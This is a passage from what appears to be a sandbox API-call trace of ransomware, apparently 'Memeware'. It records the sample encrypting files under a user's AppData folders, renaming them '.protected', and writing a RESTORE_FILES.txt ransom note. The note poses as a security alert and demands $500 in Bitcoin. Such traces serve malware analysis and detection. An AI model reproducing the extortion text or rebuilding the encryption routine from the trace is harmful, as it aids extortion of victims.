lpString2="RESTORE_FILES.txt") returned 1 [0090.360] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.360] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.360] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 76 [0090.360] StrStrW (lpFirst="SYNCHIST", lpSrch=".txt") returned 0x0 [0090.360] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 76 [0090.360] StrStrW (lpFirst="SYNCHIST", lpSrch=".rar") returned 0x0 [0090.360] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 76 [0090.360] StrStrW (lpFirst="SYNCHIST", lpSrch=".zip") returned 0x0 [0090.360] ReadFile (in: hFile=0x14c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ea24*=0x4c, lpOverlapped=0x0) returned 1 [0090.361] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffffb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.361] WriteFile (in: hFile=0x14c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ea24*=0x4c, lpOverlapped=0x0) returned 1 [0090.361] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.361] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0090.361] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0090.362] CloseHandle (hObject=0x14c) returned 1 [0090.362] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.protected") returned 86 [0090.362] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist.protected")) returned 1 [0090.363] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.363] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.363] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\RESTORE_FILES.txt") returned 85 [0090.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.363] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.363] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.364] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.364] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.364] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.364] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.364] CloseHandle (hObject=0xd8) returned 1 [0090.364] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.364] lstrcmpiW (lpString1="Publisher", lpString2="Windows") returned -1 [0090.364] lstrcmpiW (lpString1="Publisher", lpString2="Program Files") returned 1 [0090.364] lstrcmpiW (lpString1="Publisher", lpString2="Program Files (x86)") returned 1 [0090.364] lstrcmpiW (lpString1="Publisher", lpString2="$Recycle.bin") returned 1 [0090.364] lstrcmpiW (lpString1="Publisher", lpString2="System Volume Information") returned -1 [0090.364] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher") returned 69 [0090.364] lstrcmpW (lpString1="Publisher", lpString2=".") returned 1 [0090.364] lstrcmpW (lpString1="Publisher", lpString2="..") returned 1 [0090.364] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\*") returned 71 [0090.364] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.365] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.365] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.365] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.365] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.365] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.365] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\.") returned 71 [0090.365] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.365] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.365] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.365] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.365] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.365] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.365] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.365] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\..") returned 72 [0090.366] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.366] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.366] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.366] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.366] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\RESTORE_FILES.txt") returned 87 [0090.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.366] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.366] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.367] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.367] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.367] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.367] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.367] CloseHandle (hObject=0xd8) returned 1 [0090.367] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.367] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="Windows") returned -1 [0090.367] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="Program Files") returned 1 [0090.367] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="Program Files (x86)") returned 1 [0090.367] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="$Recycle.bin") returned 1 [0090.367] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="System Volume Information") returned -1 [0090.367] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks") returned 85 [0090.367] lstrcmpW (lpString1="Publisher Building Blocks", lpString2=".") returned 1 [0090.367] lstrcmpW (lpString1="Publisher Building Blocks", lpString2="..") returned 1 [0090.367] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*") returned 87 [0090.367] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.368] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.368] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.368] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.368] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.368] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.368] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\.") returned 87 [0090.368] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.368] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.368] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.368] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.368] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.368] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.368] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.368] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\..") returned 88 [0090.368] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.368] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.368] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.368] lstrcmpiW (lpString1="ContentStore.xml", lpString2="Windows") returned -1 [0090.368] lstrcmpiW (lpString1="ContentStore.xml", lpString2="Program Files") returned -1 [0090.368] lstrcmpiW (lpString1="ContentStore.xml", lpString2="Program Files (x86)") returned -1 [0090.368] lstrcmpiW (lpString1="ContentStore.xml", lpString2="$Recycle.bin") returned 1 [0090.368] lstrcmpiW (lpString1="ContentStore.xml", lpString2="System Volume Information") returned -1 [0090.368] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml") returned 102 [0090.368] StrStrIW (lpFirst="ContentStore.xml", lpSrch=".protected") returned 0x0 [0090.368] lstrcmpW (lpString1="ContentStore.xml", lpString2="RESTORE_FILES.txt") returned -1 [0090.368] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.369] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml") returned 102 [0090.369] StrStrW (lpFirst="ContentStore.xml", lpSrch=".txt") returned 0x0 [0090.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml") returned 102 [0090.369] StrStrW (lpFirst="ContentStore.xml", lpSrch=".rar") returned 0x0 [0090.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml") returned 102 [0090.369] StrStrW (lpFirst="ContentStore.xml", lpSrch=".zip") returned 0x0 [0090.370] ReadFile (in: hFile=0x14c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ea24*=0xa8, lpOverlapped=0x0) returned 1 [0090.370] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffff58, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.370] WriteFile (in: hFile=0x14c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ea24*=0xa8, lpOverlapped=0x0) returned 1 [0090.370] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.371] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0090.371] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0090.371] CloseHandle (hObject=0x14c) returned 1 [0090.371] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.protected") returned 112 [0090.371] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml.protected")) returned 1 [0090.371] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.372] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.372] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\RESTORE_FILES.txt") returned 103 [0090.372] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.372] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.372] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.373] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.373] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.373] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.373] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.373] CloseHandle 